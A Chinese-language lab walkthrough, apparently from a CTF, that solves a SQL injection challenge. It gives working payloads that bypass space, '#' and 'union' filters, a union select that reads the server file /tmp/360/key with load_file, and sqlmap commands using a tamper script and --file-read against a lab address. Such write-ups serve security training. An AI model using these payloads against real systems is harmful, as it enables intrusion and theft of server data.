1、?id=1'

2、?id=1'and'1'='1

1、使用 order by 判斷語句模板列數(shù)

發(fā)現(xiàn)語句在執(zhí)行中過濾了空格還過濾了“#”

執(zhí)行失敗：

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

執(zhí)行成功：

?id=1')and'1'='1'order/**/by/**/3%23

解釋：

?id=1')and'1'='1'order/**/by/**/3%23

• ')用來閉合前面的語句，order/**/by/**/3%23（order by 3）用來查詢模板列數(shù)

• /**/（用注釋的方式代替空格），%23（使用url編碼代替#）

2、判斷出語句模板有4個(gè)字段

回顯正常：

?id=1')and'1'='1'order/**/by/**/4%23? #執(zhí)行 order by 4 的時(shí)候回顯正常

回顯不正常：

?id=1')and'1'='1'order/**/by/**/5%23? #執(zhí)行 order by 5 的時(shí)候回顯不正常

回顯不正常：

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路：使用 and 1=2 報(bào)錯(cuò)找回顯點(diǎn)

回顯正常：

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路：由于過濾了union，所以這里使用雙寫的方式經(jīng)行過濾繞過，并且判斷出回顯點(diǎn)有3個(gè)（語句模板中的2，3，4位置均為回顯點(diǎn)）

執(zhí)行成功：

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解釋：

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

• database() #當(dāng)前數(shù)據(jù)庫名

• user() #當(dāng)前數(shù)據(jù)庫用戶名

• load_file('/tmp/360/key') #讀取服務(wù)器文件

1、由于前面判斷出了此題注入點(diǎn)存在過濾空格的情況，所以在使用sqlmap的時(shí)候需要指定腳本（用注釋/**/替換空格字符' '：--tamper "space2comment.py"）運(yùn)行

命令：

• python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py腳本所以使用python執(zhí)行，用kali就直接用第二條命令就行
• sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令：

• python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key" ?#我用的是sqlmap.py腳本所以使用python執(zhí)行，用kali就直接用第二條命令就行
• sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key" ?